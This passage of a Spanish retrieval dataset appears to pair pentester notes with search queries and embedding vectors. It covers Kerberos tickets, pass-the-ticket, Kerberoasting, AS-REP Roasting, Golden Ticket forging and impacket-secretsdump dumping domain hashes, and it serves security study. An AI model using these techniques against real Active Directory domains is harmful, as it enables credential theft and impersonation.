-0.07946, 0.0192, -0.08653, -0.1034, 0.07136, 0.0164, 0.00345, -0.0366, -0.04945, -0.00947, 0.17303, 0.05657, 0.10121, 0.04248, 0.12072, -0.03621, 0.05, -0.05651, 0.03041, 0.02323, -0.01912, 0.07875, -0.02623, -0.11823, -0.03602, -0.06068, -0.03812, 0.03841, 0.04525, 0.09309, 0.02552, 0.01993, 0.00515, -0.10777, 0.02438, -0.0423, -0.07934, 0.03087, -0.05899, 0.02095, -0.07812, 0.07082, -0.00678, 0.1442, 0.04308, -0.03017, -0.06187, 0.0795, -0.00312, -0.00581, -0.07332, -0.01993, -0.07383, 0.10677, 0.0272, 0.03741, 0.07655, -0.01768, -0.08451, 0.05094, 0.00991, -0.09522, 0.03639, 0.00294, -0.00841, 0.04923, -0.05067, -0.07719, 0.02005, 0.02881, -0.01063, -0.03766, -0.04054, -0.00062, -0.01012, 0.00104, -0.02417, -0.00851, 0.00401, 0.08049, -0.03486, 0.04915, 0.00666, -0.04674, 0.00022, -0.05594, 0.01354, -8e-05, -0.06473, -0.0383, -0.05227, 0.05114, -0.00904, 0.03993, -0.0934, -0.02272, -0.02501, 0.02503, -0.05934, -0.0208, -0.0292, -0.01071, 0.08884, -0.03735, -0.03038, 0.03082, 0.0302, 0.16234, -0.02037, 0.06561, 0.08465, -0.00687, -0.0174, -0.0298, 0.02996, -0.05924, 0.02304, -0.0129, -0.04335, -0.0703, 0.06443, 0.04719, -0.05812, 0.01901, 0.02642, -0.03354, 0.03211, 0.04694, 0.05962, 0.01989, -0.04858, 0.01865, -0.01565, -0.03973, -0.03709, -0.0134, 0.013, -0.0054, -0.07351, -0.00273, 0.06911, 0.00242, 0.05008, 0.04504, -0.00646, -0.04046, 0.05198, 0.03457, 0.00039, -0.05654, 0.00967, -0.01918, -0.05175, 0.02828, -0.0473, -0.00089, 0.00801, 0.02623, -0.01048, 0.00509, -0.01011, -0.01337, 0.03975, -0.06023, -0.00018, -0.00751, 0.10005, 0.00997, -0.01764, -0.02838, 0.02447, 0.0144, 0.03576, -0.00453, 0.03929, 0.0213, -0.02102, -0.01281, -0.03368, 0.03726, 0.05547, -0.00236, -0.06842, -0.02813, -0.10416, -0.00537, 0.02273, 0.05889, -0.02016, 0.00266, -0.04351, 0.00479, 0.01214, -0.00801]} +{"tipo": "pregunta", "herramienta": "Kerberos", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Kerberos.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## En 30 segundos\n```\nUsuario --(ΒΏpwd?)--> KDC (Domain Controller)\nUsuario <--(TGT: \"carnet maestro\")-- KDC\nUsuario --(TGT + \"quiero \\\\fileSrv\")--> KDC\nUsuario <--(TGS: ticket para fileSrv)-- KDC\nUsuario --(TGS)--> fileServer \"este ticket prueba que soy yo\"\n```", "indexar": "con quΓ© herramienta verifico que el usuario tiene acceso a \\fileSrv", "v": [-0.0662, 0.02623, -0.1963, -0.1641, 0.13041, -0.0965, -0.05809, -0.10624, 0.02308, -0.13901, -0.02021, -0.14134, 0.00079, -0.07907, 0.16847, 0.02266, 0.08609, -0.12737, 0.01603, 0.0913, 0.03667, -0.05156, -0.09068, 0.02261, -0.11283, -0.01598, 0.01237, -0.03316, -0.14019, 0.01061, 0.0953, 0.04684, -0.01501, -0.0221, -0.10903, -0.02516, 0.01997, 0.06742, -0.01587, 0.14274, 0.08088, -0.00667, -0.09423, 0.13577, -0.00271, -0.06806, -0.07812, 0.05012, -0.02518, 0.07485, 2e-05, -0.13037, -0.18603, -0.01504, -0.08074, -0.10924, 0.17362, -0.11841, 0.13267, -0.10138, -0.18524, 0.05281, -0.02993, 0.01552, -0.0125, -0.01456, 0.07962, -0.00979, -0.02814, 0.02619, -0.05191, 0.05961, -0.05012, -0.02289, 0.00061, -0.01555, -0.00579, 0.01989, 0.03068, -0.03183, 0.04013, -0.06962, -0.05233, -0.01106, -0.14185, -0.10282, 0.08473, -0.01831, -0.00019, -0.09708, 0.05262, 0.10651, -0.01576, -0.00178, 0.04222, -0.00897, 0.06345, -0.07329, 0.00614, -0.0698, 0.0722, -0.02188, -0.06885, 0.08699, -0.04936, -0.04383, -0.02304, -0.0375, -0.06163, -0.02553, 0.11941, -0.00494, 0.01951, -0.04026, -0.01938, 0.09402, -0.07488, -0.08658, -0.01992, -0.09293, 0.03848, -0.04721, -0.03017, -0.05909, 0.03329, -0.06144, -0.02024, 0.07832, -0.02432, -0.06897, 0.00421, 0.00652, -0.07679, 0.02408, -0.03276, -0.03918, -0.01707, -0.13826, -0.04384, -0.00421, 0.05257, 0.04177, 0.01118, -0.01536, 0.0291, -0.00334, -0.08347, -0.00544, -0.09077, 0.01278, 0.02512, -0.0728, -0.02769, 0.0559, -0.06328, 0.04911, -0.00414, -0.00602, -0.0393, -0.00091, -0.02889, -0.0193, 0.03127, 0.01409, 0.05492, -0.05841, 0.00962, -0.01435, 0.06157, -0.00545, -0.00121, 0.0035, 0.02697, -0.05778, -0.03818, -0.07935, -0.03561, -0.04666, 0.03937, -0.09323, -0.0771, 0.02178, -0.02435, -0.01989, -0.02406, -0.05821, 0.01584, -0.0159, 0.02943, 0.0753, -0.00496, 0.09755, 0.0227, -0.03603, 0.03539, -0.03851, -0.0302, -0.02282, 0.07031, 0.00206, -0.06543, -0.00105, -0.048, -0.05704, 0.03476, 0.04016, -0.02539, 0.00043, -0.03147, 0.00235, 0.03926, -0.01467, 0.07434, 0.02851, -0.0315, -0.01331, 0.01953, 0.02405, -0.03374, -0.02484, -0.00525, 0.0458, 0.06223, -0.01231, 0.02431, 0.02447, 0.04538, 0.01772, 0.04592, 0.01257, 0.00841, 0.00736, -0.02423, -0.00941, 0.08286, -0.02276, 0.05343, -0.01068, -0.00561, -0.06355, 0.01622, 0.08609, 0.00751, -0.0376, -0.01704, -0.01184, -0.08204, 0.00404, -0.01286, -0.09417, -0.00522, -0.00013, 0.06733, -0.06482, 0.01868, -0.08004]} +{"tipo": "pregunta", "herramienta": "Kerberos", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Kerberos.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Conceptos\n- **TGT** = carnet maestro del KDC. Lo guarda el cliente.\n- **TGS** = ticket de un servicio concreto.\n- **krbtgt** = la cuenta que **firma TODOS los TGT**.", "indexar": "quΓ© programa me sirve para gestionar las cuentas krbtgt y los tickets KDC", "v": [-0.03317, -0.03646, 0.0144, -0.15145, 0.10078, -0.22355, 0.08443, 0.22739, -0.13783, -0.06288, -0.10635, -0.18293, -0.06535, -0.10802, -0.00777, -0.05559, 0.04934, -0.04565, 0.09033, -0.02837, 0.04513, -0.1126, 0.12399, 0.03731, -0.0916, -0.00098, 0.13159, 0.00156, -0.12129, 0.04565, 0.08623, -0.09456, -0.03534, -0.08055, 0.12366, -0.00895, -0.0096, 0.12144, 0.05591, 0.0082, 0.03911, -0.08575, 0.04286, 0.10036, 0.10984, -0.1061, 0.02656, 0.02351, -0.01828, 0.01048, -0.1079, -0.01572, -0.10742, 0.09552, -0.07258, -0.03868, -0.10215, -0.12352, -0.00411, 0.02187, -0.05965, -0.01285, -0.01957, -0.01168, -0.01728, 0.01193, 0.06323, -0.02149, -0.06007, -0.00296, -0.15349, 0.05102, 0.02857, 0.01617, 0.00109, -0.00095, 0.12027, 0.02226, 0.02463, -0.04725, -0.04046, -0.05222, -0.02715, -0.01094, -0.03272, -0.05435, 0.09901, -0.01604, -0.04414, 0.00928, 0.00932, -0.01558, 0.01622, 0.05808, 0.04563, 0.00074, 0.06579, 0.02324, -0.02619, 0.01698, -0.05092, 0.02219, -0.11215, 0.07923, -0.11983, 0.12544, 0.14319, -0.07547, -0.00374, 0.01096, -0.02033, 0.04497, -0.12273, 0.00546, -0.01097, 0.06751, -0.03984, -0.033, 0.08422, -0.00754, -0.05391, -0.0181, 0.04152, -0.04715, 0.12204, -0.05293, -0.03499, 0.08291, 0.03013, 0.05697, -0.03464, -0.05099, 0.02399, 0.02306, -0.04638, -0.12119, -0.04233, 0.02963, -0.03404, -0.03844, -0.07752, 0.08332, 0.03098, -0.0841, 0.0468, -0.03798, 0.0471, -0.06481, 0.03342, 0.05778, 0.05183, -0.06697, -0.04608, 0.04621, -0.03744, -0.04424, 0.0209, -0.003, -0.09228, 0.02579, -0.07016, -0.01621, 0.02845, 0.05537, 0.05279, -0.07293, -0.04355, 0.02137, 0.0936, 0.04803, -0.00917, 0.08086, 0.10334, 0.00642, 0.03224, -0.09584, 0.00473, -0.13298, 0.0453, -0.02499, -0.03487, 0.00746, 0.09856, 0.01893, -0.0056, -0.02872, 0.01076, -0.00569, 0.06594, 0.00139, 0.0011, 0.01675, -0.03554, -0.05186, -0.03812, -0.03928, -0.0351, -0.02723, 0.00511, -0.03415, -0.0372, 0.04877, 0.01373, 0.00381, 0.06409, 0.06939, 0.0436, 0.08898, 0.00785, 0.05594, 0.02952, -0.03265, 0.04781, -0.05184, -0.03027, 0.00138, -0.0304, 0.00357, 0.02766, 0.05807, -0.02407, -0.02723, 0.0184, -0.01374, 0.02549, -0.07888, 0.06514, -0.05709, 0.04989, 0.03644, -0.06374, 0.0094, 0.00138, 0.03229, 0.0125, 0.00126, -0.00102, -0.02736, -0.00982, -0.04123, 0.01275, 0.03405, 0.03248, -0.00058, -0.05543, -0.00063, -0.07059, 0.0149, -0.00358, -0.03103, 0.00735, -0.0334, 0.01405, 0.01978, 0.03197, -0.00618]} +{"tipo": "pregunta", "herramienta": "Kerberos", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Kerberos.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Conceptos\n- **TGT** = carnet maestro del KDC. Lo guarda el cliente.\n- **TGS** = ticket de un servicio concreto.\n- **krbtgt** = la cuenta que **firma TODOS los TGT**.", "indexar": "con quΓ© puedo montar un servicio de autenticaciΓ³n basado en Kerberos", "v": [0.02679, -0.01513, -0.1287, 0.11978, -0.13762, -0.05804, 0.04634, 0.17165, -0.2087, -0.18052, -0.18969, -0.0012, 0.06599, -0.04929, 0.1371, 0.08775, -0.01377, -0.0547, 0.13865, 0.14387, 0.13796, -0.03145, 0.03659, -0.05931, -0.04296, 0.03058, 0.03424, -0.12468, -0.05897, 0.12953, -0.00205, 0.09122, -0.01824, 0.06639, 0.01361, -0.09597, -0.09784, 0.14857, 0.07472, -0.0173, 0.01814, -0.02413, 0.14992, 0.08222, -0.02259, 0.04727, 0.05172, -0.08918, -0.03303, 0.00168, 0.11384, -0.07685, -0.15575, -0.04972, -0.15997, -0.03632, 0.11455, -0.04665, 0.03508, 0.01249, -0.01619, 0.0012, -0.06355, 0.07102, 0.08324, -0.15117, -0.02995, -0.00291, 0.02038, -0.03905, -0.06745, -0.0216, 0.04719, 0.04601, -0.04423, 0.06514, -0.04006, -0.06091, 0.03343, 0.11159, 0.05262, 0.03935, 0.02854, 0.0657, -0.02953, -0.04844, 0.02936, -0.09351, 0.02672, -0.04187, 0.06885, 0.11362, 0.0265, 0.02273, -0.04981, -0.07844, -0.03303, 0.07597, -0.02812, -0.02758, -0.03892, -0.01202, -0.00439, 0.14637, 0.04189, -0.00386, 0.04289, 0.0105, 0.03414, -0.07929, -0.02464, -0.00586, -0.08759, 0.04409, -0.09703, -0.06312, -0.0287, 0.01767, 0.01305, 0.03752, -0.06812, 0.05765, 0.13763, -0.03737, 0.02561, 0.0148, 0.08834, 0.09158, -0.00647, -0.00274, 0.00641, 0.05289, -0.0469, -0.04999, 0.02858, -0.01101, -0.01041, -0.07668, -0.02069, 0.04592, 0.05034, 0.02569, -0.02172, -0.01237, 0.03945, 0.05018, 0.02276, -0.08292, -0.03256, -0.01991, 0.011, 0.11398, 0.02801, 0.06057, -0.06067, -0.05664, 0.03626, -0.05108, 0.02685, 0.11493, 0.01761, -0.01028, 0.00823, 0.03175, 0.00676, -0.02186, -0.01369, 0.00601, 0.0485, 0.04093, -0.07166, 0.04558, 0.03025, -0.03307, 0.09239, 0.0772, -0.05458, -0.04564, -0.02068, -0.00466, 0.00237, -0.07648, 0.04391, 0.01538, 0.00816, 0.04354, -0.01389, -0.01901, -0.0285, -0.00936, 0.03262, -0.03955, -0.03585, 0.0418, 0.05288, -0.04309, 0.01812, 0.00594, 0.03509, -0.01405, -0.08591, -0.02546, 0.01494, 0.01524, 0.02822, 0.00165, 0.01684, 0.05447, -0.03451, 0.07434, -0.01344, -0.02536, 0.06576, -0.07453, -0.03096, 0.04064, 0.02936, -0.05289, -0.04637, 0.055, -0.02518, 0.00041, 0.05869, 0.01944, 0.01189, 0.04733, 0.05746, -0.03289, 0.01381, 0.01187, -0.01176, -0.03133, -0.06023, 0.01171, 0.01519, 0.01563, 0.05619, 0.04136, -0.03978, -0.02823, 0.06105, 0.08312, -0.01508, 0.01121, -0.001, -0.01906, -0.03892, 0.03137, -0.00763, -0.03652, -0.04133, 0.00539, -0.02326, -0.01109, 0.01154, -0.07562]} +{"tipo": "pregunta", "herramienta": "Kerberos", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Kerberos.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Conceptos\n- **TGT** = carnet maestro del KDC. Lo guarda el cliente.\n- **TGS** = ticket de un servicio concreto.\n- **krbtgt** = la cuenta que **firma TODOS los TGT**.", "indexar": "cuΓ‘l es una alternativa libre a herramientas como krb5kdc o MIT Kerberos", "v": [0.0165, -0.15529, 0.06304, 0.04466, -0.02182, -0.21549, -0.04786, 0.26686, -0.15847, -0.15195, -0.09331, -0.10836, 0.08878, -0.04796, 0.18013, -0.01571, -0.06703, -0.12592, 0.06302, -0.00162, 0.05408, -0.02489, -0.00434, 0.0736, -0.0539, -0.02691, 0.02126, 0.04035, -0.16537, 0.14468, 0.00555, 0.05651, -0.04407, 0.04563, -0.02672, -0.05407, 0.02812, 0.13799, 0.02044, 0.0112, -0.04734, -0.09592, 0.00215, 0.14317, 0.02328, -0.13594, -0.12893, 0.00381, -0.06521, 0.10383, -0.08407, -0.07722, -0.11265, 0.03337, 0.035, -0.05258, 0.11244, -0.11831, -0.0254, -0.00276, -0.07954, 0.04456, -0.09965, 0.01443, 0.05244, -0.08689, -0.09991, -0.0521, -0.09429, 0.02745, 0.03986, 0.01445, -0.0221, -0.04873, -0.06331, 0.13401, -0.03516, 0.05145, 0.00654, -0.00796, 0.00528, -0.03304, -0.04044, 0.05739, -0.03161, -0.12845, 0.15191, -0.07999, -0.01294, -0.03103, 0.03483, 0.0899, 0.07694, 0.11309, -0.00761, -0.07719, 0.00771, 0.06896, -0.00562, 0.00343, 0.05344, 0.01387, -0.08704, 0.00233, -0.05389, 0.00739, -0.00557, -0.01508, -0.01411, -0.0736, 0.02741, 0.08888, 0.01048, -0.01909, 0.03568, 0.03168, -0.07806, -0.06168, 0.00845, -0.00953, 0.04081, 0.08091, 0.01264, -0.07684, 0.0352, 0.0333, -0.02762, 0.00269, 0.03774, -0.0066, 0.0151, -0.02641, -0.02653, -0.06892, -0.06445, -0.05465, 0.01701, -0.05121, -0.03058, -0.06021, -0.06539, 0.0634, -0.02957, -0.08313, 0.06686, -0.05134, 0.01063, -0.03328, 0.0293, -0.04252, -0.10045, 0.02719, 0.00786, 0.03612, 0.03563, -0.01964, -0.04909, 0.00069, -0.01683, 0.06699, 0.05028, -0.04986, 0.01022, 0.03913, 0.02995, 0.00212, 0.06264, 0.05123, -0.01174, 0.05824, 0.08205, 0.07199, 0.02084, -0.00465, 0.05705, -0.06842, 0.07891, -0.06146, -0.04201, -0.06675, 0.03124, 0.03032, -0.06279, -0.02264, 0.05183, -0.0785, 0.0635, -0.07102, 0.02846, -0.02294, -0.07238, -0.02007, -0.04961, -0.09148, -0.00767, 0.05103, 0.00096, -0.05339, 0.01742, -0.00801, -0.10496, -0.00342, -0.01108, -0.06007, -0.00421, -0.0028, -0.00677, 0.05084, -0.05795, 0.04809, 0.07854, -0.04296, 0.07748, 0.0095, -0.05236, 0.00976, -0.01478, -0.06187, 0.001, -0.00982, 0.02955, 0.0274, 0.03925, -0.0292, 0.03728, 0.04324, -0.00848, 0.00517, -0.03433, 0.00602, -0.04256, 0.0134, -0.00876, 0.04004, 0.0146, 0.0395, 0.02441, 0.02735, -0.01288, 0.00106, 0.0476, 0.00996, 0.00446, -0.02072, -0.04152, -0.00078, -0.05276, -0.0366, -0.0201, -0.03366, -0.02487, 0.00069, 0.00808, -0.03566, 0.0001, -0.02766]} +{"tipo": "pregunta", "herramienta": "Kerberos", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Kerberos.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Por quΓ© importa (los ataques)\n- Reutilizar un TGT/TGS vΓ‘lido = **pass-the-ticket**.\n- Pedir TGS de cuentas con SPN sin tenerlas = Kerberoasting.\n- Usuarios sin pre-auth = AS-REP Roasting.\n- Hash de **krbtgt** = forjar Golden Ticket (ser cualquiera, para siempre).\n\nRelacionado: Impacket Β· Mimikatz Β· OSCP MOC", "indexar": "que herramienta sirve para forjar tickets vΓ‘lidos sin las contraseΓ±as reales?", "v": [0.09075, -0.00776, -0.16911, -0.17643, 0.06295, -0.14478, -0.03433, -0.1336, 0.03765, -0.0288, 0.03948, -0.11314, 0.0421, -0.06159, 0.12647, 0.08303, 0.03561, -0.00788, 0.08553, 0.07309, 0.01741, -0.06725, -0.11851, -0.0609, -0.10613, 0.031, 0.12091, -0.00129, -0.14916, 0.05858, 0.05015, -0.01944, 0.03527, -0.14094, -0.0149, 0.02855, 0.01519, 0.18245, -0.07327, 0.0135, 0.11686, 0.02698, -0.0876, 0.10932, -0.0525, -0.01918, -0.0121, 0.06616, 0.01725, -0.01315, -0.02358, -0.13852, -0.09101, 0.0113, -0.03292, -0.23404, 0.16453, 0.01916, -0.03046, -0.0922, -0.14687, -0.0012, 0.02584, 0.03735, -0.03618, -0.05076, 0.15567, -0.00753, -0.03987, -0.02141, -0.13999, 0.03241, 0.02277, 0.07949, -0.01157, -0.04059, 0.0833, 0.01222, 0.02765, 0.06135, 0.06659, -0.0385, 0.03373, -0.02803, -0.01349, -0.01434, 0.08488, -0.09404, 0.03816, -0.05969, -0.00617, 0.10313, 0.08738, -0.00834, 0.02379, -0.07643, 0.02311, -0.0623, -0.02561, -0.01064, 0.02886, -0.0323, -0.03863, 0.06634, -0.03781, 0.02615, 0.02657, -0.01021, -0.00321, -0.00283, 0.03893, 0.00314, -0.06713, 0.02849, 0.02106, 0.08283, -0.00825, -0.05588, 0.01868, 0.00582, 0.00455, -0.02962, -0.05191, -0.07032, 0.01441, 0.09203, -0.01964, 0.0523, 0.01746, -0.1115, -0.02747, -0.01801, -0.10959, 0.0391, -0.02432, -0.04198, 0.01844, -0.1307, -0.06243, 0.01321, -0.01225, 0.02632, -0.0261, -0.10501, 0.01178, 0.05484, -0.00126, -0.03132, -0.03725, -0.04025, 0.05721, -0.06883, 0.04383, 0.09711, 0.01971, 0.05187, -0.04176, -0.05117, -0.13822, 0.10279, -0.04031, -0.04755, -0.01812, 0.03084, -0.05115, -0.05319, -0.05551, -0.00542, 0.08769, 0.09544, 0.05894, 0.04173, 0.11447, 0.00549, 0.02038, -0.06099, -0.08904, -0.04647, 0.02638, -0.14217, 0.03079, -0.06804, -0.00318, -0.01599, -0.0071, -0.01553, 0.07794, -0.00205, 0.04641, 0.01068, 0.04499, -0.00907, 0.01573, 0.03963, 0.01572, 0.00055, -0.02443, -0.08158, -0.0107, -0.05705, -0.02735, -0.01965, -0.01171, -0.06654, 0.09322, 0.0616, -0.05163, -0.03991, 0.00178, 0.0135, 0.00989, -0.01034, 0.00913, -0.05293, -0.05246, -0.10682, 0.01041, 0.02484, -0.00155, -0.0158, 0.02996, -0.00996, 0.05086, 0.00867, 0.00619, -0.03667, -0.01861, -0.00286, 0.04507, 0.00581, 0.03944, 0.01602, 0.00702, 0.03686, 0.04393, -0.06181, -0.00238, -0.02569, -0.05358, -0.00075, -0.02442, 0.04235, 0.01796, -0.04973, -0.05663, -0.02413, -0.01075, -0.04754, 0.03679, -0.04829, -0.03732, 0.02767, 0.04123, -0.01491, 0.01929, -0.05514]} +{"tipo": "pregunta", "herramienta": "Kerberos", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Kerberos.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Por quΓ© importa (los ataques)\n- Reutilizar un TGT/TGS vΓ‘lido = **pass-the-ticket**.\n- Pedir TGS de cuentas con SPN sin tenerlas = Kerberoasting.\n- Usuarios sin pre-auth = AS-REP Roasting.\n- Hash de **krbtgt** = forjar Golden Ticket (ser cualquiera, para siempre).\n\nRelacionado: Impacket Β· Mimikatz Β· OSCP MOC", "indexar": "con que puedo reutilizar un TGT vΓ‘lido para acceder a sistemas como si fuera yo?", "v": [-0.28179, 0.15957, -0.30654, 0.06167, 0.06819, 0.02685, -0.09988, -0.02613, 0.02226, -0.01383, -0.17174, -0.04743, 0.09196, 0.12252, 0.00932, 0.10083, 0.08391, -0.08678, -0.02176, -0.01412, 0.07324, -0.05749, 0.01877, -0.13687, -0.03868, 0.08374, 0.02648, -0.12128, -0.11333, 0.02251, -0.01039, 0.01604, 0.01329, -0.20274, -0.17182, -0.03869, 0.08659, 0.18581, -0.05421, -0.01924, 0.10109, -0.00453, -0.08336, 0.06738, 0.06854, 0.05675, 0.00952, -0.0397, 0.03687, -0.07412, -0.06513, -0.04264, -0.14958, -0.05761, 0.02865, -0.11075, 0.11796, -0.01296, 0.00309, 0.03262, -0.01644, -0.01027, -0.02455, 0.04968, 0.04071, -0.02801, -0.01607, 0.03964, -0.09622, 0.09519, -0.10114, -0.0031, -0.00073, -0.04539, -0.01108, 0.05632, 0.00552, 0.02522, 0.02477, 0.0416, -0.05014, -0.03959, -0.06148, 0.02416, -0.00643, -0.0618, 0.04228, -0.10795, 0.02289, -0.01989, -0.00278, 0.02527, -0.00553, 0.03228, -0.07069, -0.09247, -0.08651, 0.04108, -0.06988, 0.04923, -0.02227, -0.05599, -0.08855, 0.04044, 0.00492, -0.00494, 0.05928, -0.06605, 0.04682, -0.01858, -0.04327, -0.0656, -0.04406, -0.06123, -0.01499, 0.00321, -0.02611, -0.03602, -0.05575, 0.04015, -0.09931, -0.05258, 0.02405, -0.03822, 0.06973, -0.00055, 0.04019, 0.09838, -0.01588, 0.01782, -0.01936, 0.06454, -0.08957, -0.00124, -0.0199, -0.04912, 0.04001, 0.0076, -0.01903, 0.05109, -0.03006, 0.09376, -0.02751, 0.02005, 0.00723, 0.00726, 0.01095, -0.11404, -0.01745, -0.04717, -0.00286, 0.05467, -0.03269, 0.01814, 0.02477, 0.06508, 0.04489, -0.03726, 0.03574, 0.0268, -0.08921, -0.00097, -0.00904, 0.00409, -0.01277, -0.00708, -0.05311, -0.08616, 0.04659, 0.07163, 0.01471, 0.05981, -0.00937, -0.05995, 0.02955, -0.06192, -0.0812, -0.03549, 0.01061, -0.00673, -0.06969, 0.00199, -0.03336, -0.07706, -0.07516, 0.04915, 0.01018, 0.00615, 0.05671, 0.03621, 0.04225, 0.0746, -0.00326, -0.00482, -0.02899, -0.02541, -0.0485, -0.06142, -0.00554, -0.00626, -0.08822, 0.03672, 0.01419, -0.08351, 0.02807, 0.04519, 0.00231, 0.05763, 0.01424, 0.02316, 0.03794, 0.00544, 0.03879, -0.0308, -0.08267, -0.03021, 0.02082, 0.00975, 0.03812, -0.06183, 0.01845, -0.00437, 0.0421, 0.05328, 0.03254, -0.03488, 0.05282, -0.01515, -0.00927, -0.00973, -0.05973, -0.00862, 0.02846, -0.03805, -0.00057, -0.01511, -0.0098, -0.01219, -0.05964, -0.06581, 0.03208, 0.04822, -0.06847, -3e-05, 0.00193, -0.04993, -0.08492, 0.00954, 0.01529, -0.08107, -0.03378, 0.03165, -0.02387, -0.02994, 0.02772, -0.02333]} +{"tipo": "pregunta", "herramienta": "Kerberos", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Kerberos.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Por quΓ© importa (los ataques)\n- Reutilizar un TGT/TGS vΓ‘lido = **pass-the-ticket**.\n- Pedir TGS de cuentas con SPN sin tenerlas = Kerberoasting.\n- Usuarios sin pre-auth = AS-REP Roasting.\n- Hash de **krbtgt** = forjar Golden Ticket (ser cualquiera, para siempre).\n\nRelacionado: Impacket Β· Mimikatz Β· OSCP MOC", "indexar": "cual es una alternativa libre a Impacket o Mimikatz para ataques de roasting?", "v": [-0.13123, 0.02721, -0.10226, 0.06941, 0.01015, -0.00734, -0.09303, 0.07513, -0.19134, 0.01314, 0.03921, -0.13632, 0.08412, 0.07425, 0.19662, -0.04444, 0.05643, 0.04436, 0.19524, -0.06174, -0.06003, 0.00666, -0.02962, 0.03482, -0.04504, 0.05403, 0.08021, 0.15639, -0.08217, -0.05419, -0.03072, -0.07693, -0.01845, -0.00098, -0.04477, -0.07176, 0.13905, 0.04011, 0.17977, -0.07673, 0.00744, -0.04627, -0.18817, 0.03851, 0.0599, -0.00063, -0.00976, -0.06919, 0.09284, 0.05701, -0.03852, -0.01592, 0.00459, 0.00824, 0.00797, 0.0204, -0.02844, -0.16088, -0.07483, 0.10366, -0.04289, 0.01105, -0.03749, -0.08388, 0.11896, -0.05747, -0.15386, -0.00943, -0.01854, 0.07719, 0.07557, -0.07309, 0.0318, -0.06419, -0.05785, 0.09336, 0.0306, 0.04151, 0.00185, 0.01543, -0.06449, -0.08598, -0.01421, 0.07327, -0.03252, -0.07373, 0.0666, -0.07325, -0.02209, 0.07265, 0.07483, 0.03356, -0.00677, 0.05558, -0.05553, -0.14231, -0.00508, 0.00087, -0.04254, 0.04078, 0.0051, 0.00483, -0.18322, 0.01467, 0.04052, -0.04957, 0.01814, -0.07784, 0.01274, -0.11639, -0.01483, 0.01534, -0.05148, -0.02567, 0.02284, -0.11226, -0.03238, -0.00385, 0.03571, -0.01305, -0.06544, 0.04751, -0.03135, 0.05681, 0.08195, -0.02255, -0.07232, 0.02403, -0.10051, -0.068, 0.09047, -0.02782, -0.01823, -0.02217, -0.04018, -0.04623, 0.09875, -0.13137, -0.02244, -0.05494, 0.00595, 0.00032, -0.01423, 0.00944, 0.00205, 0.00428, -0.0599, -0.02072, 0.01012, -0.06088, -0.10456, 0.01592, 0.01969, 0.06384, -0.0565, 0.01716, -0.07746, 0.01574, -0.02544, 0.05636, 0.04946, -0.04899, -0.00355, 0.0058, -0.02259, 0.02041, 0.01954, 0.03726, 0.03812, -0.02773, 0.00839, 0.10799, 0.06746, 0.00596, 0.06496, -0.0621, -0.03963, -0.04865, 0.01128, -0.04602, 0.00471, -0.00348, -0.0664, 0.0034, -0.01804, -0.02004, 0.09249, 0.02286, 0.04914, 0.01423, -0.04784, -0.02318, -0.02904, -0.03469, 0.00229, -0.00823, -0.00269, -0.05746, -0.03201, 0.01987, -0.02602, -0.03394, -0.06964, -0.03938, 0.0198, 0.03212, -0.05612, -0.00994, -0.00693, 0.05418, 0.09509, 0.00917, 0.16765, 0.03015, -0.06223, 0.02789, 0.03982, -0.0544, -0.0124, -0.05513, 0.07942, -0.00734, 0.01456, 0.04429, 0.03421, -0.00093, -0.01167, -0.03624, -0.05003, 0.01568, 0.05402, -0.01494, 0.03409, 0.02388, 0.00195, -0.08046, -0.01258, -0.00397, -0.05547, 0.05819, 0.01104, 0.03436, 0.01809, -0.05689, 0.02912, -0.01166, -0.13135, 0.0439, -0.0397, -0.07414, -0.00932, 0.01959, -0.00684, 0.02992, 0.05213, -0.04169]} +{"tipo": "pregunta", "herramienta": "secretsdump", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/secretsdump.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# secretsdump (NTDS.dit / SAM)\n\n> `impacket-secretsdump` vuelca **todos los hashes** del dominio (NTDS.dit) o de una mΓ‘quina (SAM/SYSTEM), en remoto o desde ficheros. Parte de Impacket.", "indexar": "ΒΏcon quΓ© puedo extraer todos los hashes de un dominio NTDS.dit?", "v": [-0.06761, -0.07048, -0.00142, 0.09409, 0.03202, 0.04795, -0.02834, -0.00605, -0.16985, 0.19063, -0.1217, -0.04698, -0.06341, -0.14975, -0.05898, -0.05382, 0.23766, -0.00861, 0.02275, -0.02688, -0.10704, -0.1775, -0.15117, -0.01849, 0.09161, -0.16298, -0.11085, 0.03087, -0.16027, 0.15764, -0.02692, -0.0649, -0.08128, 0.03897, -0.09459, 0.01988, -0.01543, 0.13774, 0.1148, 0.03352, 0.06213, 0.13302, -0.07601, 0.02603, -0.04005, -0.10808, -0.03354, -0.07244, 0.04433, -0.19563, 0.01878, -0.04313, -0.12946, -0.07635, 0.03379, -0.10005, 0.10237, -0.01566, -0.03244, -0.0269, -0.04919, -0.05425, -0.0142, -0.09212, -0.10311, -0.22365, 0.04061, 0.02909, -0.03118, 0.04767, -0.08957, 0.01262, 0.09546, -0.02438, 0.03101, -0.01086, 0.01743, -0.02867, 0.06468, -0.00729, 0.04635, -0.03969, -0.02113, -0.05736, -0.07862, -0.01619, -0.10488, -0.1383, -0.02129, 0.00342, 0.10928, 0.03136, -0.01757, -0.07323, -0.01788, -0.05535, 0.0428, 0.04556, -0.07389, -0.02633, 0.0347, 0.04549, -0.07702, 0.10016, 0.00133, 0.05329, 0.07797, -0.03508, 0.01105, 0.00119, 0.06758, -0.05204, -0.08323, -0.02024, -0.06791, 0.05957, -0.0614, 0.06204, -0.05009, -0.0034, -0.04549, -0.02185, 0.12149, 0.0258, 0.04866, 0.01688, -0.00781, 0.01957, -0.10812, -0.09724, 0.029, -0.00843, -0.03833, -0.04464, 0.06306, 0.07821, 0.04345, 0.01793, 0.00973, -0.08673, 